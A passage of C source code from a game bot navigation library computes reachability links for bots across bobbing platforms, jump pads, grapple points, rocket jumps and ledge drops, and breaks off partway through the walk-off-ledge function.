if (bestend[2] - 16 > beststart[2]) continue;
} //end if
lreach = AAS_AllocReachability();
if (!lreach) return lreachabilities;
lreach->areanum = i;
lreach->facenum = 0;
lreach->edgenum = 0;
VectorCopy(beststart, lreach->start);
VectorCopy(bestend, lreach->end);
lreach->traveltype = 0;
lreach->traveltime = 0;
lreach->next = lreachabilities;
lreachabilities = lreach;
#ifndef BSPC
if (towardsface) AAS_PermanentLine(lreach->start, lreach->end, 1);
else AAS_PermanentLine(lreach->start, lreach->end, 2);
#endif
} //end for
return lreachabilities;
} //end of the function AAS_FindFaceReachabilities
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_FuncBobbing(void)
{
int ent, spawnflags, modelnum, axis;
int i, numareas, areas[10];
char classname[MAX_EPAIRKEY], model[MAX_EPAIRKEY];
vec3_t origin, move_end, move_start, move_start_top, move_end_top;
vec3_t mins, maxs, angles = {0, 0, 0};
vec3_t start_edgeverts[4], end_edgeverts[4], mid;
vec3_t org, start, end, dir, points[10];
float height;
aas_plane_t start_plane, end_plane;
aas_lreachability_t *startreach, *endreach, *nextstartreach, *nextendreach, *lreach;
aas_lreachability_t *firststartreach, *firstendreach;
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (strcmp(classname, "func_bobbing")) continue;
AAS_FloatForBSPEpairKey(ent, "height", &height);
if (!height) height = 32;
//
if (!AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY))
{
botimport.Print(PRT_ERROR, "func_bobbing without model\n");
continue;
} //end if
//get the model number, and skip the leading *
modelnum = atoi(model+1);
if (modelnum <= 0)
{
botimport.Print(PRT_ERROR, "func_bobbing with invalid model number\n");
continue;
} //end if
//if the entity has an origin set then use it
if (!AAS_VectorForBSPEpairKey(ent, "origin", origin))
VectorSet(origin, 0, 0, 0);
//
AAS_BSPModelMinsMaxsOrigin(modelnum, angles, mins, maxs, NULL);
//
VectorAdd(mins, origin, mins);
VectorAdd(maxs, origin, maxs);
//
VectorAdd(mins, maxs, mid);
VectorScale(mid, 0.5, mid);
VectorCopy(mid, origin);
//
VectorCopy(origin, move_end);
VectorCopy(origin, move_start);
//
AAS_IntForBSPEpairKey(ent, "spawnflags", &spawnflags);
// set the axis of bobbing
if (spawnflags & 1) axis = 0;
else if (spawnflags & 2) axis = 1;
else axis = 2;
//
move_start[axis] -= height;
move_end[axis] += height;
//
Log_Write("funcbob model %d, start = {%1.1f, %1.1f, %1.1f} end = {%1.1f, %1.1f, %1.1f}\n",
modelnum, move_start[0], move_start[1], move_start[2], move_end[0], move_end[1], move_end[2]);
//
#ifndef BSPC
/*
AAS_DrawPermanentCross(move_start, 4, 1);
AAS_DrawPermanentCross(move_end, 4, 2);
*/
#endif
//
for (i = 0; i < 4; i++)
{
VectorCopy(move_start, start_edgeverts[i]);
start_edgeverts[i][2] += maxs[2] - mid[2]; //+ bbox maxs z
start_edgeverts[i][2] += 24; //+ player origin to ground dist
} //end for
start_edgeverts[0][0] += maxs[0] - mid[0];
start_edgeverts[0][1] += maxs[1] - mid[1];
start_edgeverts[1][0] += maxs[0] - mid[0];
start_edgeverts[1][1] += mins[1] - mid[1];
start_edgeverts[2][0] += mins[0] - mid[0];
start_edgeverts[2][1] += mins[1] - mid[1];
start_edgeverts[3][0] += mins[0] - mid[0];
start_edgeverts[3][1] += maxs[1] - mid[1];
//
start_plane.dist = start_edgeverts[0][2];
VectorSet(start_plane.normal, 0, 0, 1);
//
for (i = 0; i < 4; i++)
{
VectorCopy(move_end, end_edgeverts[i]);
end_edgeverts[i][2] += maxs[2] - mid[2]; //+ bbox maxs z
end_edgeverts[i][2] += 24; //+ player origin to ground dist
} //end for
end_edgeverts[0][0] += maxs[0] - mid[0];
end_edgeverts[0][1] += maxs[1] - mid[1];
end_edgeverts[1][0] += maxs[0] - mid[0];
end_edgeverts[1][1] += mins[1] - mid[1];
end_edgeverts[2][0] += mins[0] - mid[0];
end_edgeverts[2][1] += mins[1] - mid[1];
end_edgeverts[3][0] += mins[0] - mid[0];
end_edgeverts[3][1] += maxs[1] - mid[1];
//
end_plane.dist = end_edgeverts[0][2];
VectorSet(end_plane.normal, 0, 0, 1);
//
#ifndef BSPC
#if 0
for (i = 0; i < 4; i++)
{
AAS_PermanentLine(start_edgeverts[i], start_edgeverts[(i+1)%4], 1);
AAS_PermanentLine(end_edgeverts[i], end_edgeverts[(i+1)%4], 1);
} //end for
#endif
#endif
VectorCopy(move_start, move_start_top);
move_start_top[2] += maxs[2] - mid[2] + 24; //+ bbox maxs z
VectorCopy(move_end, move_end_top);
move_end_top[2] += maxs[2] - mid[2] + 24; //+ bbox maxs z
//
if (!AAS_PointAreaNum(move_start_top)) continue;
if (!AAS_PointAreaNum(move_end_top)) continue;
//
for (i = 0; i < 2; i++)
{
//
if (i == 0)
{
firststartreach = AAS_FindFaceReachabilities(start_edgeverts, 4, &start_plane, qtrue);
firstendreach = AAS_FindFaceReachabilities(end_edgeverts, 4, &end_plane, qfalse);
} //end if
else
{
firststartreach = AAS_FindFaceReachabilities(end_edgeverts, 4, &end_plane, qtrue);
firstendreach = AAS_FindFaceReachabilities(start_edgeverts, 4, &start_plane, qfalse);
} //end else
//
//create reachabilities from start to end
for (startreach = firststartreach; startreach; startreach = nextstartreach)
{
nextstartreach = startreach->next;
//
//trace = AAS_TraceClientBBox(startreach->start, move_start_top, PRESENCE_NORMAL, -1);
//if (trace.fraction < 1) continue;
//
for (endreach = firstendreach; endreach; endreach = nextendreach)
{
nextendreach = endreach->next;
//
//trace = AAS_TraceClientBBox(endreach->end, move_end_top, PRESENCE_NORMAL, -1);
//if (trace.fraction < 1) continue;
//
Log_Write("funcbob reach from area %d to %d\n", startreach->areanum, endreach->areanum);
//
//
if (i == 0) VectorCopy(move_start_top, org);
else VectorCopy(move_end_top, org);
VectorSubtract(startreach->start, org, dir);
dir[2] = 0;
VectorNormalize(dir);
VectorCopy(startreach->start, start);
VectorMA(startreach->start, 1, dir, start);
start[2] += 1;
VectorMA(startreach->start, 16, dir, end);
end[2] += 1;
//
numareas = AAS_TraceAreas(start, end, areas, points, 10);
if (numareas <= 0) continue;
if (numareas > 1) VectorCopy(points[1], startreach->start);
else VectorCopy(end, startreach->start);
//
if (!AAS_PointAreaNum(startreach->start)) continue;
if (!AAS_PointAreaNum(endreach->end)) continue;
//
lreach = AAS_AllocReachability();
lreach->areanum = endreach->areanum;
if (i == 0) lreach->edgenum = ((int)move_start[axis] << 16) | ((int) move_end[axis] & 0x0000ffff);
else lreach->edgenum = ((int)move_end[axis] << 16) | ((int) move_start[axis] & 0x0000ffff);
lreach->facenum = (spawnflags << 16) | modelnum;
VectorCopy(startreach->start, lreach->start);
VectorCopy(endreach->end, lreach->end);
#ifndef BSPC
// AAS_DrawArrow(lreach->start, lreach->end, LINECOLOR_BLUE, LINECOLOR_YELLOW);
// AAS_PermanentLine(lreach->start, lreach->end, 1);
#endif
lreach->traveltype = TRAVEL_FUNCBOB;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_funcbob;
reach_funcbob++;
lreach->next = areareachability[startreach->areanum];
areareachability[startreach->areanum] = lreach;
//
} //end for
} //end for
for (startreach = firststartreach; startreach; startreach = nextstartreach)
{
nextstartreach = startreach->next;
AAS_FreeReachability(startreach);
} //end for
for (endreach = firstendreach; endreach; endreach = nextendreach)
{
nextendreach = endreach->next;
AAS_FreeReachability(endreach);
} //end for
//only go up with func_bobbing entities that go up and down
if (!(spawnflags & 1) && !(spawnflags & 2)) break;
} //end for
} //end for
} //end of the function AAS_Reachability_FuncBobbing
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_JumpPad(void)
{
int face2num, i, ret, area2num, visualize, ent, bot_visualizejumppads;
//int modelnum, ent2;
//float dist, time, height, gravity, forward;
float speed, zvel;
//float hordist;
aas_face_t *face2;
aas_area_t *area2;
aas_lreachability_t *lreach;
vec3_t areastart, facecenter, dir, cmdmove;
vec3_t velocity, absmins, absmaxs;
//vec3_t origin, ent2origin, angles, teststart;
aas_clientmove_t move;
//aas_trace_t trace;
aas_link_t *areas, *link;
//char target[MAX_EPAIRKEY], targetname[MAX_EPAIRKEY], model[MAX_EPAIRKEY];
char classname[MAX_EPAIRKEY];
#ifdef BSPC
bot_visualizejumppads = 0;
#else
bot_visualizejumppads = LibVarValue("bot_visualizejumppads", "0");
#endif
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (strcmp(classname, "trigger_push")) continue;
//
if (!AAS_GetJumpPadInfo(ent, areastart, absmins, absmaxs, velocity)) continue;
/*
//
AAS_FloatForBSPEpairKey(ent, "speed", &speed);
if (!speed) speed = 1000;
// AAS_VectorForBSPEpairKey(ent, "angles", angles);
// AAS_SetMovedir(angles, velocity);
// VectorScale(velocity, speed, velocity);
VectorClear(angles);
//get the mins, maxs and origin of the model
AAS_ValueForBSPEpairKey(ent, "model", model, MAX_EPAIRKEY);
if (model[0]) modelnum = atoi(model+1);
else modelnum = 0;
AAS_BSPModelMinsMaxsOrigin(modelnum, angles, absmins, absmaxs, origin);
VectorAdd(origin, absmins, absmins);
VectorAdd(origin, absmaxs, absmaxs);
//
#ifdef REACH_DEBUG
botimport.Print(PRT_MESSAGE, "absmins = %f %f %f\n", absmins[0], absmins[1], absmins[2]);
botimport.Print(PRT_MESSAGE, "absmaxs = %f %f %f\n", absmaxs[0], absmaxs[1], absmaxs[2]);
#endif REACH_DEBUG
VectorAdd(absmins, absmaxs, origin);
VectorScale (origin, 0.5, origin);
//get the start areas
VectorCopy(origin, teststart);
teststart[2] += 64;
trace = AAS_TraceClientBBox(teststart, origin, PRESENCE_CROUCH, -1);
if (trace.startsolid)
{
botimport.Print(PRT_MESSAGE, "trigger_push start solid\n");
VectorCopy(origin, areastart);
} //end if
else
{
VectorCopy(trace.endpos, areastart);
} //end else
areastart[2] += 0.125;
//
//AAS_DrawPermanentCross(origin, 4, 4);
//get the target entity
AAS_ValueForBSPEpairKey(ent, "target", target, MAX_EPAIRKEY);
for (ent2 = AAS_NextBSPEntity(0); ent2; ent2 = AAS_NextBSPEntity(ent2))
{
if (!AAS_ValueForBSPEpairKey(ent2, "targetname", targetname, MAX_EPAIRKEY)) continue;
if (!strcmp(targetname, target)) break;
} //end for
if (!ent2)
{
botimport.Print(PRT_MESSAGE, "trigger_push without target entity %s\n", target);
continue;
} //end if
AAS_VectorForBSPEpairKey(ent2, "origin", ent2origin);
//
height = ent2origin[2] - origin[2];
gravity = aassettings.sv_gravity;
time = sqrt( height / ( 0.5 * gravity ) );
if (!time)
{
botimport.Print(PRT_MESSAGE, "trigger_push without time\n");
continue;
} //end if
// set s.origin2 to the push velocity
VectorSubtract ( ent2origin, origin, velocity);
dist = VectorNormalize( velocity);
forward = dist / time;
//FIXME: why multiply by 1.1
forward *= 1.1;
VectorScale(velocity, forward, velocity);
velocity[2] = time * gravity;
*/
//get the areas the jump pad brush is in
areas = AAS_LinkEntityClientBBox(absmins, absmaxs, -1, PRESENCE_CROUCH);
/*
for (link = areas; link; link = link->next_area)
{
if (link->areanum == 563)
{
ret = qfalse;
}
}
*/
for (link = areas; link; link = link->next_area)
{
if (AAS_AreaJumpPad(link->areanum)) break;
} //end for
if (!link)
{
botimport.Print(PRT_MESSAGE, "trigger_push not in any jump pad area\n");
AAS_UnlinkFromAreas(areas);
continue;
} //end if
//
botimport.Print(PRT_MESSAGE, "found a trigger_push with velocity %f %f %f\n", velocity[0], velocity[1], velocity[2]);
//if there is a horizontal velocity check for a reachability without air control
if (velocity[0] || velocity[1])
{
VectorSet(cmdmove, 0, 0, 0);
//VectorCopy(velocity, cmdmove);
//cmdmove[2] = 0;
Com_Memset(&move, 0, sizeof(aas_clientmove_t));
area2num = 0;
for (i = 0; i < 20; i++)
{
AAS_PredictClientMovement(&move, -1, areastart, PRESENCE_NORMAL, qfalse,
velocity, cmdmove, 0, 30, 0.1f,
SE_HITGROUND|SE_ENTERWATER|SE_ENTERSLIME|
SE_ENTERLAVA|SE_HITGROUNDDAMAGE|SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER, 0, bot_visualizejumppads);
area2num = move.endarea;
for (link = areas; link; link = link->next_area)
{
if (!AAS_AreaJumpPad(link->areanum)) continue;
if (link->areanum == area2num) break;
} //end if
if (!link) break;
VectorCopy(move.endpos, areastart);
VectorCopy(move.velocity, velocity);
} //end for
if (area2num && i < 20)
{
for (link = areas; link; link = link->next_area)
{
if (!AAS_AreaJumpPad(link->areanum)) continue;
if (AAS_ReachabilityExists(link->areanum, area2num)) continue;
//create a rocket or bfg jump reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach)
{
AAS_UnlinkFromAreas(areas);
return;
} //end if
lreach->areanum = area2num;
//NOTE: the facenum is the Z velocity
lreach->facenum = velocity[2];
//NOTE: the edgenum is the horizontal velocity
lreach->edgenum = sqrt(velocity[0] * velocity[0] + velocity[1] * velocity[1]);
VectorCopy(areastart, lreach->start);
VectorCopy(move.endpos, lreach->end);
lreach->traveltype = TRAVEL_JUMPPAD;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_jumppad;
lreach->next = areareachability[link->areanum];
areareachability[link->areanum] = lreach;
//
reach_jumppad++;
} //end for
} //end if
} //end if
//
if (fabs(velocity[0]) > 100 || fabs(velocity[1]) > 100) continue;
//check for areas we can reach with air control
for (area2num = 1; area2num < aasworld.numareas; area2num++)
{
visualize = qfalse;
/*
if (area2num == 3568)
{
for (link = areas; link; link = link->next_area)
{
if (link->areanum == 3380)
{
visualize = qtrue;
botimport.Print(PRT_MESSAGE, "bah\n");
} //end if
} //end for
} //end if*/
//never try to go back to one of the original jumppad areas
//and don't create reachabilities if they already exist
for (link = areas; link; link = link->next_area)
{
if (AAS_ReachabilityExists(link->areanum, area2num)) break;
if (AAS_AreaJumpPad(link->areanum))
{
if (link->areanum == area2num) break;
} //end if
} //end if
if (link) continue;
//
area2 = &aasworld.areas[area2num];
for (i = 0; i < area2->numfaces; i++)
{
face2num = aasworld.faceindex[area2->firstface + i];
face2 = &aasworld.faces[abs(face2num)];
//if it is not a ground face
if (!(face2->faceflags & FACE_GROUND)) continue;
//get the center of the face
AAS_FaceCenter(face2num, facecenter);
//only go higher up
if (facecenter[2] < areastart[2]) continue;
//get the jumppad jump z velocity
zvel = velocity[2];
//get the horizontal speed for the jump, if it isn't possible to calculate this
//speed
ret = AAS_HorizontalVelocityForJump(zvel, areastart, facecenter, &speed);
if (ret && speed < 150)
{
//direction towards the face center
VectorSubtract(facecenter, areastart, dir);
dir[2] = 0;
//hordist = VectorNormalize(dir);
//if (hordist < 1.6 * facecenter[2] - areastart[2])
{
//get command movement
VectorScale(dir, speed, cmdmove);
//
AAS_PredictClientMovement(&move, -1, areastart, PRESENCE_NORMAL, qfalse,
velocity, cmdmove, 30, 30, 0.1f,
SE_ENTERWATER|SE_ENTERSLIME|
SE_ENTERLAVA|SE_HITGROUNDDAMAGE|
SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER|SE_HITGROUNDAREA, area2num, visualize);
//if prediction time wasn't enough to fully predict the movement
//don't enter slime or lava and don't fall from too high
if (move.frames < 30 &&
!(move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA|SE_HITGROUNDDAMAGE))
&& (move.stopevent & (SE_HITGROUNDAREA|SE_TOUCHJUMPPAD|SE_TOUCHTELEPORTER)))
{
//never go back to the same jumppad
for (link = areas; link; link = link->next_area)
{
if (link->areanum == move.endarea) break;
}
if (!link)
{
for (link = areas; link; link = link->next_area)
{
if (!AAS_AreaJumpPad(link->areanum)) continue;
if (AAS_ReachabilityExists(link->areanum, area2num)) continue;
//create a jumppad reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach)
{
AAS_UnlinkFromAreas(areas);
return;
} //end if
lreach->areanum = move.endarea;
//NOTE: the facenum is the Z velocity
lreach->facenum = velocity[2];
//NOTE: the edgenum is the horizontal velocity
lreach->edgenum = sqrt(cmdmove[0] * cmdmove[0] + cmdmove[1] * cmdmove[1]);
VectorCopy(areastart, lreach->start);
VectorCopy(facecenter, lreach->end);
lreach->traveltype = TRAVEL_JUMPPAD;
lreach->traveltype |= AAS_TravelFlagsForTeam(ent);
lreach->traveltime = aassettings.rs_aircontrolledjumppad;
lreach->next = areareachability[link->areanum];
areareachability[link->areanum] = lreach;
//
reach_jumppad++;
} //end for
}
} //end if
} //end if
} //end for
} //end for
} //end for
AAS_UnlinkFromAreas(areas);
} //end for
} //end of the function AAS_Reachability_JumpPad
//===========================================================================
// never point at ground faces
// always a higher and pretty far area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_Grapple(int area1num, int area2num)
{
int face2num, i, j, areanum, numareas, areas[20];
float mingrappleangle, z, hordist;
bsp_trace_t bsptrace;
aas_trace_t trace;
aas_face_t *face2;
aas_area_t *area1, *area2;
aas_lreachability_t *lreach;
vec3_t areastart, facecenter, start, end, dir, down = {0, 0, -1};
float *v;
//only grapple when on the ground or swimming
if (!AAS_AreaGrounded(area1num) && !AAS_AreaSwim(area1num)) return qfalse;
//don't grapple from a crouch area
if (!(AAS_AreaPresenceType(area1num) & PRESENCE_NORMAL)) return qfalse;
//NOTE: disabled area swim it doesn't work right
if (AAS_AreaSwim(area1num)) return qfalse;
//
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
//don't grapple towards way lower areas
if (area2->maxs[2] < area1->mins[2]) return qfalse;
//
VectorCopy(aasworld.areas[area1num].center, start);
//if not a swim area
if (!AAS_AreaSwim(area1num))
{
if (!AAS_PointAreaNum(start)) Log_Write("area %d center %f %f %f in solid?\r\n", area1num,
start[0], start[1], start[2]);
VectorCopy(start, end);
end[2] -= 1000;
trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
if (trace.startsolid) return qfalse;
VectorCopy(trace.endpos, areastart);
} //end if
else
{
if (!(AAS_PointContents(start) & (CONTENTS_LAVA|CONTENTS_SLIME|CONTENTS_WATER))) return qfalse;
} //end else
//
//start is now the start point
//
for (i = 0; i < area2->numfaces; i++)
{
face2num = aasworld.faceindex[area2->firstface + i];
face2 = &aasworld.faces[abs(face2num)];
//if it is not a solid face
if (!(face2->faceflags & FACE_SOLID)) continue;
//direction towards the first vertex of the face
v = aasworld.vertexes[aasworld.edges[abs(aasworld.edgeindex[face2->firstedge])].v[0]];
VectorSubtract(v, areastart, dir);
//if the face plane is facing away
if (DotProduct(aasworld.planes[face2->planenum].normal, dir) > 0) continue;
//get the center of the face
AAS_FaceCenter(face2num, facecenter);
//only go higher up with the grapple
if (facecenter[2] < areastart[2] + 64) continue;
//only use vertical faces or downward facing faces
if (DotProduct(aasworld.planes[face2->planenum].normal, down) < 0) continue;
//direction towards the face center
VectorSubtract(facecenter, areastart, dir);
//
z = dir[2];
dir[2] = 0;
hordist = VectorLength(dir);
if (!hordist) continue;
//if too far
if (hordist > 2000) continue;
//check the minimal angle of the movement
mingrappleangle = 15; //15 degrees
if (z / hordist < tan(2 * M_PI * mingrappleangle / 360)) continue;
//
VectorCopy(facecenter, start);
VectorMA(facecenter, -500, aasworld.planes[face2->planenum].normal, end);
//
bsptrace = AAS_Trace(start, NULL, NULL, end, 0, CONTENTS_SOLID);
//the grapple won't stick to the sky and the grapple point should be near the AAS wall
if ((bsptrace.surface.flags & SURF_SKY) || (bsptrace.fraction * 500 > 32)) continue;
//trace a full bounding box from the area center on the ground to
//the center of the face
VectorSubtract(facecenter, areastart, dir);
VectorNormalize(dir);
VectorMA(areastart, 4, dir, start);
VectorCopy(bsptrace.endpos, end);
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
VectorSubtract(trace.endpos, facecenter, dir);
if (VectorLength(dir) > 24) continue;
//
VectorCopy(trace.endpos, start);
VectorCopy(trace.endpos, end);
end[2] -= AAS_FallDamageDistance();
trace = AAS_TraceClientBBox(start, end, PRESENCE_NORMAL, -1);
if (trace.fraction >= 1) continue;
//area to end in
areanum = AAS_PointAreaNum(trace.endpos);
//if not in lava or slime
if (aasworld.areasettings[areanum].contents & (AREACONTENTS_SLIME|AREACONTENTS_LAVA))
{
continue;
} //end if
//do not go the the source area
if (areanum == area1num) continue;
//don't create reachabilities if they already exist
if (AAS_ReachabilityExists(area1num, areanum)) continue;
//only end in areas we can stand
if (!AAS_AreaGrounded(areanum)) continue;
//never go through cluster portals!!
numareas = AAS_TraceAreas(areastart, bsptrace.endpos, areas, NULL, 20);
if (numareas >= 20) continue;
for (j = 0; j < numareas; j++)
{
if (aasworld.areasettings[areas[j]].contents & AREACONTENTS_CLUSTERPORTAL) break;
} //end for
if (j < numareas) continue;
//create a new reachability link
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = areanum;
lreach->facenum = face2num;
lreach->edgenum = 0;
VectorCopy(areastart, lreach->start);
//VectorCopy(facecenter, lreach->end);
VectorCopy(bsptrace.endpos, lreach->end);
lreach->traveltype = TRAVEL_GRAPPLEHOOK;
VectorSubtract(lreach->end, lreach->start, dir);
lreach->traveltime = aassettings.rs_startgrapple + VectorLength(dir) * 0.25;
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_grapple++;
} //end for
//
return qfalse;
} //end of the function AAS_Reachability_Grapple
//===========================================================================
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_SetWeaponJumpAreaFlags(void)
{
int ent, i;
vec3_t mins = {-15, -15, -15}, maxs = {15, 15, 15};
vec3_t origin;
int areanum, weaponjumpareas, spawnflags;
char classname[MAX_EPAIRKEY];
weaponjumpareas = 0;
for (ent = AAS_NextBSPEntity(0); ent; ent = AAS_NextBSPEntity(ent))
{
if (!AAS_ValueForBSPEpairKey(ent, "classname", classname, MAX_EPAIRKEY)) continue;
if (
!strcmp(classname, "item_armor_body") ||
!strcmp(classname, "item_health") ||
!strcmp(classname, "weapon_disruptor") ||
!strcmp(classname, "weapon_repeater") ||
!strcmp(classname, "weapon_demp2") ||
!strcmp(classname, "weapon_flechette") ||
!strcmp(classname, "weapon_rocket_launcher"))
{
if (AAS_VectorForBSPEpairKey(ent, "origin", origin))
{
spawnflags = 0;
AAS_IntForBSPEpairKey(ent, "spawnflags", &spawnflags);
//if not a stationary item
if (!(spawnflags & 1))
{
if (!AAS_DropToFloor(origin, mins, maxs))
{
botimport.Print(PRT_MESSAGE, "%s in solid at (%1.1f %1.1f %1.1f)\n",
classname, origin[0], origin[1], origin[2]);
} //end if
} //end if
//areanum = AAS_PointAreaNum(origin);
areanum = AAS_BestReachableArea(origin, mins, maxs, origin);
//the bot may rocket jump towards this area
aasworld.areasettings[areanum].areaflags |= AREA_WEAPONJUMP;
//
//if (!AAS_AreaGrounded(areanum))
// botimport.Print(PRT_MESSAGE, "area not grounded\n");
//
weaponjumpareas++;
} //end if
} //end if
} //end for
for (i = 1; i < aasworld.numareas; i++)
{
if (aasworld.areasettings[i].contents & AREACONTENTS_JUMPPAD)
{
aasworld.areasettings[i].areaflags |= AREA_WEAPONJUMP;
weaponjumpareas++;
} //end if
} //end for
botimport.Print(PRT_MESSAGE, "%d weapon jump areas\n", weaponjumpareas);
} //end of the function AAS_SetWeaponJumpAreaFlags
//===========================================================================
// create a possible weapon jump reachability from area1 to area2
//
// check if there's a cool item in the second area
// check if area1 is lower than area2
// check if the bot can rocketjump from area1 to area2
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
int AAS_Reachability_WeaponJump(int area1num, int area2num)
{
int face2num, i, n, ret, visualize;
float speed, zvel;
//float hordist;
aas_face_t *face2;
aas_area_t *area1, *area2;
aas_lreachability_t *lreach;
vec3_t areastart, facecenter, start, end, dir, cmdmove;// teststart;
vec3_t velocity;
aas_clientmove_t move;
aas_trace_t trace;
visualize = qfalse;
// if (area1num == 4436 && area2num == 4318)
// {
// visualize = qtrue;
// }
if (!AAS_AreaGrounded(area1num) || AAS_AreaSwim(area1num)) return qfalse;
if (!AAS_AreaGrounded(area2num)) return qfalse;
//NOTE: only weapon jump towards areas with an interesting item in it??
if (!(aasworld.areasettings[area2num].areaflags & AREA_WEAPONJUMP)) return qfalse;
//
area1 = &aasworld.areas[area1num];
area2 = &aasworld.areas[area2num];
//don't weapon jump towards way lower areas
if (area2->maxs[2] < area1->mins[2]) return qfalse;
//
VectorCopy(aasworld.areas[area1num].center, start);
//if not a swim area
if (!AAS_PointAreaNum(start)) Log_Write("area %d center %f %f %f in solid?\r\n", area1num,
start[0], start[1], start[2]);
VectorCopy(start, end);
end[2] -= 1000;
trace = AAS_TraceClientBBox(start, end, PRESENCE_CROUCH, -1);
if (trace.startsolid) return qfalse;
VectorCopy(trace.endpos, areastart);
//
//areastart is now the start point
//
for (i = 0; i < area2->numfaces; i++)
{
face2num = aasworld.faceindex[area2->firstface + i];
face2 = &aasworld.faces[abs(face2num)];
//if it is not a solid face
if (!(face2->faceflags & FACE_GROUND)) continue;
//get the center of the face
AAS_FaceCenter(face2num, facecenter);
//only go higher up with weapon jumps
if (facecenter[2] < areastart[2] + 64) continue;
//NOTE: set to 2 to allow bfg jump reachabilities
for (n = 0; n < 1/*2*/; n++)
{
//get the rocket jump z velocity
if (n) zvel = AAS_BFGJumpZVelocity(areastart);
else zvel = AAS_RocketJumpZVelocity(areastart);
//get the horizontal speed for the jump, if it isn't possible to calculate this
//speed (the jump is not possible) then there's no jump reachability created
ret = AAS_HorizontalVelocityForJump(zvel, areastart, facecenter, &speed);
if (ret && speed < 300)
{
//direction towards the face center
VectorSubtract(facecenter, areastart, dir);
dir[2] = 0;
//hordist = VectorNormalize(dir);
//if (hordist < 1.6 * (facecenter[2] - areastart[2]))
{
//get command movement
VectorScale(dir, speed, cmdmove);
VectorSet(velocity, 0, 0, zvel);
/*
//get command movement
VectorScale(dir, speed, velocity);
velocity[2] = zvel;
VectorSet(cmdmove, 0, 0, 0);
*/
//
AAS_PredictClientMovement(&move, -1, areastart, PRESENCE_NORMAL, qtrue,
velocity, cmdmove, 30, 30, 0.1f,
SE_ENTERWATER|SE_ENTERSLIME|
SE_ENTERLAVA|SE_HITGROUNDDAMAGE|
SE_TOUCHJUMPPAD|SE_HITGROUND|SE_HITGROUNDAREA, area2num, visualize);
//if prediction time wasn't enough to fully predict the movement
//don't enter slime or lava and don't fall from too high
if (move.frames < 30 &&
!(move.stopevent & (SE_ENTERSLIME|SE_ENTERLAVA|SE_HITGROUNDDAMAGE))
&& (move.stopevent & (SE_HITGROUNDAREA|SE_TOUCHJUMPPAD)))
{
//create a rocket or bfg jump reachability from area1 to area2
lreach = AAS_AllocReachability();
if (!lreach) return qfalse;
lreach->areanum = area2num;
lreach->facenum = 0;
lreach->edgenum = 0;
VectorCopy(areastart, lreach->start);
VectorCopy(facecenter, lreach->end);
if (n)
{
lreach->traveltype = TRAVEL_BFGJUMP;
lreach->traveltime = aassettings.rs_bfgjump;
} //end if
else
{
lreach->traveltype = TRAVEL_ROCKETJUMP;
lreach->traveltime = aassettings.rs_rocketjump;
} //end else
lreach->next = areareachability[area1num];
areareachability[area1num] = lreach;
//
reach_rocketjump++;
return qtrue;
} //end if
} //end if
} //end if
} //end for
} //end for
//
return qfalse;
} //end of the function AAS_Reachability_WeaponJump
//===========================================================================
// calculates additional walk off ledge reachabilities for the given area
//
// Parameter: -
// Returns: -
// Changes Globals: -
//===========================================================================
void AAS_Reachability_WalkOffLedge(int areanum)
{
int i, j, k, l, m, n, p, areas[10], numareas;
int face1num, face2num, face3num, edge1num, edge2num, edge3num;
int otherareanum, gap, reachareanum, side;
aas_area_t *area, *area2;
aas_face_t *face1, *face2, *face3;
aas_edge_t *edge;
aas_plane_t *plane;
float *v1, *v2;
vec3_t sharededgevec, mid, dir, testend;
aas_lreachability_t *lreach;
aas_trace_t trace;
if (!AAS_AreaGrounded(areanum) || AAS_AreaSwim(areanum)) return;
//
area = &aasworld.areas[areanum];
//
for (i = 0; i < area->numfaces; i++)
{
face1num = aasworld.faceindex[area->firstface + i];
face1 = &aasworld.faces[abs(face1num)];
//face 1 must be a ground face
if (!(face1->faceflags & FACE_GROUND)) continue;
//go through all the edges of this ground face
for (k = 0; k < face1->numedges; k++)
{
edge1num = aasworld.edgeindex[face1->firstedge + k];
//find another not ground face using this same edge
for (j = 0; j < area->numfaces; j++)
{
face2num = aasworld.faceindex[area->firstface + j];
face2 = &aasworld.faces[abs(face2num)];
//face 2 may not be a ground face
if (face2->faceflags & FACE_GROUND) continue;
//compare all the edges
for (l = 0; l < face2->numedges; l++)
{
edge2num = aasworld.edgeindex[face2->firstedge + l];
if (abs(edge1num) == abs(edge2num))
{
//get the area at the other side of the face
if (face2->frontarea == areanum) otherareanum = face2->backarea;
else otherareanum = face2->frontarea;
//
area2 = &aasworld.areas[otherareanum];
//if the other area is grounded!
if (aasworld.areasettings[otherareanum].areaflags & AREA_GROUNDED)
{
//check for a possible gap
gap = qfalse;
for (n = 0; n < area2->numfaces; n++)
{
face3num = aasworld.faceindex[area2->firstface + n];
//may not be the shared face of the two areas
if (abs(face3num) == abs(face2num)) continue;
//
face3 = &aasworld.faces[abs(face3num)];
//find an edge shared by all three faces
for (m = 0; m < face3->numedges; m++)
{
edge3num = aasworld.edgeindex[face3->firstedge + m];
//but the edge should be shared by all three faces
if (abs(edge3num) == abs(edge1num))
{
